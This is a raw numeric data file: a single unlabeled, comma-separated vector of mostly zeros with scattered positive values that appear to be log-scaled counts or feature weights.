0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 2.4849066497880004, 0, 4.007333185232471, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 16.237278281910243, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.7612001156935624, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 4.330733340286331, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 1.3862943611198906, 0, 3.8005740880419454, 0.0, 0, 0.0, 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 7.454719949364001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.995732273553991, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 2.70805020110221, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.1972245773362196, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.302585092994046, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 11.484086901809196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.295836866004329, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 2.6390573296152584, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 2.3978952727983707, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.70805020110221, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0910424533583156, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.6931471805599453, 0.0, 3.8918202981106265, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 2.6390573296152584, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 4.518263445217987, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 17.287514144901962, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.70805020110221, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.189654742026425, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 2.1972245773362196, 1.7412592803704001, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 